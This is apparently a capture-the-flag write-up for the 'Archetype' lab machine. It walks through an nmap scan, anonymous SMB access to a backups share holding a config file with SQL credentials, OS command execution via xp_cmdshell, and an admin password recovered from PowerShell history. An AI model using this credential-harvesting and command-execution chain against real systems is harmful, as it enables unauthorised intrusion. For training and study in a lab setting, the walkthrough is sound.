Archetype

Personal Rating: Very Easy

Enumeration

A first nmap scan reveals a few interesting ports and shows its a Windows machine:

sudo nmap -A <IP>

PORT     STATE SERVICE      VERSION
# 135/tcp  open  msrpc        Microsoft Windows RPC
# 139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
# 445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
# 1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM


| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763


# Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows


| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
#|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
#|_    TCP port: 1433
| smb-os-discovery: 
#|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-03T10:30:50-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-03T17:30:51
|_  start_date: N/A

Pillaging and SQL Access

With smbclient I could login anonymously and fetch this config file containing a password:

sqlclient -N \\\\10.10.10.27\\backups\\
smb: \> get prod.dtsConfig

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

The password could be used to authenticate to the sql client with sql_svc:M3g4c0rp123

python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth

SQL OS Commands

In the SQL shell I could use the commands to execute os commands and get the user flag:

enable_xp_cmdshell
RECONFIGURE
xp_cmdshell type \Users\sql_svc\Desktop\user.txt

3e7b<SNIP>21a3

Further Pillaging

The admin password was contained in the powershell history, which could be found by running an enumeration script or with manual pillaging:

MEGACORP_4dm1n!!

From here, a tool like psexec or evil-winrm could be used to access the host and get the admin flag.

b91cc<SNIP>8528

PreviousAcademy NextArctic

Last updated 1 year ago